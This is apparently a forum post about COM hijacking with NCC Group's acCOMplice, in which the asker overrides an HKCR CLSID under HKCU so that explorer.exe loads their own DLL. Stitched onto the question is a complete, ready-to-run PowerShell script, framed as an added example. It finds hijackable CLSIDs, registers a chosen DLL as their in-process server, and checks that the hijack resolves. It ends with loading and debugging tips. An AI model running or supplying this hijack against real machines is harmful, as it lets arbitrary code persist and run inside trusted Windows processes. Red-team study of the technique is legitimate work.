I am trying to get this working: https://github.com/nccgroup/acCOMplice
I compiled the DLL and did the COM hijacking by hand (I tried the tools too, but I want to understand the whole thing a bit more, and they did not do the job anyway…).
So, as far as I understood the code, the whole thing works the following way:
I look for an HKCR key which has no corresponding HKCU key, and write my own DLL into the HKCU key I created (with the same CLSID). The DLL I used is taken from the GitHub page I linked above.
But no matter which key I hijack, neither the key nor the COM directory (which is created by the DLL code to contain the log file) shows up. Since the new HKCU key seems to break explorer.exe, I am assuming that it is at least recognised by Windows.
My question is: Is there a way to debug (e.g. in windbg) the calls of explorer.exe to my dll? And what am I doing wrong in the process I explained above?
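The hijacking procedure the post describes (find a CLSID that is registered machine-wide but has no per-user override, then register your own InprocServer32 under HKCU with the same CLSID), as an added PowerShell example that is not part of the original post and not code from the acCOMplice project. The DLL path and the choice of CLSID are assumptions; everything else is plain registry manipulation.

```powershell
# Added example, not from the original post or from nccgroup/acCOMplice.
# Enumerates CLSIDs with a machine-wide InprocServer32 but no per-user
# override, registers a per-user override for one of them, and verifies
# which DLL the merged HKCR view now resolves to.

$DllPath = 'C:\Users\Public\hijack.dll'   # assumption: path to the compiled DLL

function Get-HijackableClsid {
    # HKCR is a merged view of HKLM\Software\Classes and HKCU\Software\Classes,
    # and the per-user branch wins. A CLSID that exists only under HKLM is
    # therefore a candidate: creating it under HKCU redirects every in-process
    # activation of that CLSID in this user's processes.
    Get-ChildItem 'Registry::HKEY_LOCAL_MACHINE\Software\Classes\CLSID' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $clsid  = $_.PSChildName
            $inproc = Join-Path $_.PSPath 'InprocServer32'
            if (-not (Test-Path $inproc)) { return }                  # out-of-proc or no server
            if (Test-Path "HKCU:\Software\Classes\CLSID\$clsid") { return }  # already overridden
            [pscustomobject]@{
                CLSID  = $clsid
                Server = (Get-ItemProperty -Path $inproc).'(default)'  # machine-wide DLL
            }
        }
}

function Register-UserClsid {
    # Creates HKCU\Software\Classes\CLSID\{clsid}\InprocServer32 pointing at
    # our DLL. ThreadingModel=Both avoids a marshalling failure when the
    # original server was registered as Apartment or Free.
    param([Parameter(Mandatory)][string]$Clsid,
          [Parameter(Mandatory)][string]$Dll)
    $key = "HKCU:\Software\Classes\CLSID\$Clsid\InprocServer32"
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name '(default)'      -Value $Dll
    Set-ItemProperty -Path $key -Name 'ThreadingModel' -Value 'Both'
}

function Get-ResolvedServer {
    # Reads the merged HKCR view, i.e. what CoCreateInstance will actually use.
    param([Parameter(Mandatory)][string]$Clsid)
    (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32").'(default)'
}

function Unregister-UserClsid {
    # Cleanup: removing the HKCU key restores the machine-wide registration.
    param([Parameter(Mandatory)][string]$Clsid)
    Remove-Item -Path "HKCU:\Software\Classes\CLSID\$Clsid" -Recurse -Force -ErrorAction SilentlyContinue
}

# Usage (pick a CLSID from the candidate list rather than the first one blindly):
$candidates = Get-HijackableClsid
$candidates | Select-Object -First 10 | Format-Table -AutoSize

$target = $candidates[0].CLSID              # assumption: the CLSID you chose to hijack
Register-UserClsid -Clsid $target -Dll $DllPath
"HKCR now resolves $target to: $(Get-ResolvedServer -Clsid $target)"
# Expected: the path in $DllPath. If it still shows the original server, the
# HKCU key was created under the wrong path (it must be Software\Classes\CLSID).

# Unregister-UserClsid -Clsid $target      # run this to undo the hijack
```

Two checks worth doing before blaming the hijack itself: the DLL must export `DllGetClassObject` and `DllCanUnloadNow` (`dumpbin /exports hijack.dll`), and its bitness must match the process that loads it, so a 64-bit explorer.exe will silently refuse a 32-bit DLL. Process Monitor filtered on the CLSID string and on the DLL path shows whether explorer.exe reads the new key and whether `LoadImage` for the DLL ever happens, which narrows the problem down before attaching a debugger.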